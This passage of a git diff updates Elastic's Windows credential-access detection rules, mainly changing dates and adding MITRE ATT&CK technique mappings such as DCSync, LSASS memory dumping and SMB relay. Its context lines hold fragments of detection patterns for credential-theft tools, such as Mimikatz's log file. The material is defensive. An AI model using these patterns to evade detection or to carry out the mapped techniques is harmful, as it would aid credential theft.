framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.003" name = "Credentials from Web Browsers" @@ -122,4 +129,15 @@ id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1185" +name = "Browser Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1185/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/credential_access_dcsync_user_backdoor.toml b/rules/windows/credential_access_dcsync_user_backdoor.toml index e220648179d..4c78e191a4a 100644 --- a/rules/windows/credential_access_dcsync_user_backdoor.toml +++ b/rules/windows/credential_access_dcsync_user_backdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,19 +106,31 @@ event.code:"5136" and host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.006" name = "DCSync" reference = "https://attack.mitre.org/techniques/T1003/006/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_disable_kerberos_preauth.toml b/rules/windows/credential_access_disable_kerberos_preauth.toml index f69365d6a48..f71fe2879f1 100644 --- a/rules/windows/credential_access_disable_kerberos_preauth.toml +++ b/rules/windows/credential_access_disable_kerberos_preauth.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,48 +91,62 @@ any where host.os.type == "windows" and event.code == "4738" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.004" name = "AS-REP Roasting" reference = "https://attack.mitre.org/techniques/T1558/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_dnsnode_creation.toml b/rules/windows/credential_access_dnsnode_creation.toml index 4dd21727dec..4f3271ced6e 100644 --- a/rules/windows/credential_access_dnsnode_creation.toml +++ b/rules/windows/credential_access_dnsnode_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,14 +104,18 @@ any where host.os.type == "windows" and event.code == "5137" and winlog.event_da [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_dollar_account_relay_kerberos.toml b/rules/windows/credential_access_dollar_account_relay_kerberos.toml index 0a76152c2fc..0566e9d8819 100644 --- a/rules/windows/credential_access_dollar_account_relay_kerberos.toml +++ b/rules/windows/credential_access_dollar_account_relay_kerberos.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,6 +106,7 @@ sequence by winlog.computer_name, source.ip with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" @@ -115,15 +116,26 @@ reference = "https://attack.mitre.org/techniques/T1187/" id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml index 25f74db6270..1b26420a8b4 100644 --- a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml +++ b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -57,24 +57,33 @@ file where host.os.type == "windows" and event.type != "deletion" and file.name [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.004" +name = "LSA Secrets" +reference = "https://attack.mitre.org/techniques/T1003/004/" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_iis_connectionstrings_dumping.toml b/rules/windows/credential_access_iis_connectionstrings_dumping.toml index ad8287b9688..025d8529f50 100644 --- a/rules/windows/credential_access_iis_connectionstrings_dumping.toml +++ b/rules/windows/credential_access_iis_connectionstrings_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,14 +95,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_imageload_azureadconnectauthsvc.toml b/rules/windows/credential_access_imageload_azureadconnectauthsvc.toml index cba25263080..24bfc0ac87f 100644 --- a/rules/windows/credential_access_imageload_azureadconnectauthsvc.toml +++ b/rules/windows/credential_access_imageload_azureadconnectauthsvc.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/14" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Matteo Potito Giorgio"] @@ -99,14 +99,31 @@ not (?dll.code_signature.trusted == true or file.code_signature.status == "Valid [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_kerberoasting_unusual_process.toml b/rules/windows/credential_access_kerberoasting_unusual_process.toml index 7f3932dcef5..7a30322d950 100644 --- a/rules/windows/credential_access_kerberoasting_unusual_process.toml +++ b/rules/windows/credential_access_kerberoasting_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/02" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -168,14 +168,31 @@ network where host.os.type == "windows" and event.type == "start" and network.di [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.003" +name = "Pass the Ticket" +reference = "https://attack.mitre.org/techniques/T1550/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/credential_access_kerberos_coerce.toml b/rules/windows/credential_access_kerberos_coerce.toml index 0ddf57939c2..8c9692a2d05 100644 --- a/rules/windows/credential_access_kerberos_coerce.toml +++ b/rules/windows/credential_access_kerberos_coerce.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,24 +103,23 @@ host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - -[[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_kerberos_coerce_dns.toml b/rules/windows/credential_access_kerberos_coerce_dns.toml index 0269e12bbd3..e9750ecd5e8 100644 --- a/rules/windows/credential_access_kerberos_coerce_dns.toml +++ b/rules/windows/credential_access_kerberos_coerce_dns.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/06/14" +updated_date = "2026/03/24" [transform] [[transform.investigate]] @@ -95,24 +95,23 @@ network where host.os.type == "windows" and dns.question.name : "*UWhRC*BAAAA*" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - -[[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_ldap_attributes.toml b/rules/windows/credential_access_ldap_attributes.toml index 9cb9ff680a5..d076bed63ce 100644 --- a/rules/windows/credential_access_ldap_attributes.toml +++ b/rules/windows/credential_access_ldap_attributes.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,7 @@ any where host.os.type == "windows" and event.code == "4662" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" @@ -127,32 +128,49 @@ reference = "https://attack.mitre.org/techniques/T1003/" id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - +[[rule.threat.technique]] +id = "T1649" +name = "Steal or Forge Authentication Certificates" +reference = "https://attack.mitre.org/techniques/T1649/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml index cb444a5b057..4f25fe6c2d1 100644 --- a/rules/windows/credential_access_lsass_loaded_susp_dll.toml +++ b/rules/windows/credential_access_lsass_loaded_susp_dll.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,19 +142,36 @@ The Local Security Authority Subsystem Service (LSASS) is crucial for managing s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_machine_account_smb_relay.toml b/rules/windows/credential_access_machine_account_smb_relay.toml index 74eb4c912b9..4fddce0cab7 100644 --- a/rules/windows/credential_access_machine_account_smb_relay.toml +++ b/rules/windows/credential_access_machine_account_smb_relay.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,6 +82,7 @@ file where host.os.type == "windows" and event.code == "5145" and endswith(user. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" @@ -91,15 +92,31 @@ reference = "https://attack.mitre.org/techniques/T1187/" id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml index cbc58475eaa..8b7aa352cb7 100644 --- a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml +++ b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,14 +96,36 @@ file where host.os.type == "windows" and file.name : "mimilsa.log" and process.n [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_mimikatz_powershell_module.toml b/rules/windows/credential_access_mimikatz_powershell_module.toml index 19d4c6879de..6366fd23398 100644 --- a/rules/windows/credential_access_mimikatz_powershell_module.toml +++ b/rules/windows/credential_access_mimikatz_powershell_module.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,22 +135,44 @@ powershell.file.script_block_text:( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - +[[rule.threat.technique]] +id = "T1649" +name = "Steal or Forge Authentication Certificates" +reference = "https://attack.mitre.org/techniques/T1649/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_mod_wdigest_security_provider.toml b/rules/windows/credential_access_mod_wdigest_security_provider.toml index d54be2d33fe..03fe548545a 100644 --- a/rules/windows/credential_access_mod_wdigest_security_provider.toml +++ b/rules/windows/credential_access_mod_wdigest_security_provider.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,19 +100,31 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_moving_registry_hive_via_smb.toml b/rules/windows/credential_access_moving_registry_hive_via_smb.toml index 7dc0c02f2da..9c4ed0a37f3 100644 --- a/rules/windows/credential_access_moving_registry_hive_via_smb.toml +++ b/rules/windows/credential_access_moving_registry_hive_via_smb.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,36 +83,49 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml index 3f82b5ebbed..a66e6cacb47 100644 --- a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml +++ b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/18" integration = ["endpoint", "m365_defender", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -151,26 +151,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.008" +name = "Network Provider DLL" +reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/credential_access_posh_invoke_ninjacopy.toml b/rules/windows/credential_access_posh_invoke_ninjacopy.toml index 756fcb25eba..0713a1dcfe4 100644 --- a/rules/windows/credential_access_posh_invoke_ninjacopy.toml +++ b/rules/windows/credential_access_posh_invoke_ninjacopy.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,10 +142,12 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" @@ -156,43 +158,51 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.004" +name = "LSA Secrets" +reference = "https://attack.mitre.org/techniques/T1003/004/" +[[rule.threat.technique.subtechnique]] +id = "T1003.005" +name = "Cached Domain Credentials" +reference = "https://attack.mitre.org/techniques/T1003/005/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1006" name = "Direct Volume Access" reference = "https://attack.mitre.org/techniques/T1006/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_kerb_ticket_dump.toml b/rules/windows/credential_access_posh_kerb_ticket_dump.toml index 8039fe58cfc..2050fa06d2e 100644 --- a/rules/windows/credential_access_posh_kerb_ticket_dump.toml +++ b/rules/windows/credential_access_posh_kerb_ticket_dump.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -126,40 +126,49 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_relay_tools.toml b/rules/windows/credential_access_posh_relay_tools.toml index 87be03b98ba..22fae39b3d0 100644 --- a/rules/windows/credential_access_posh_relay_tools.toml +++ b/rules/windows/credential_access_posh_relay_tools.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,52 +125,57 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE 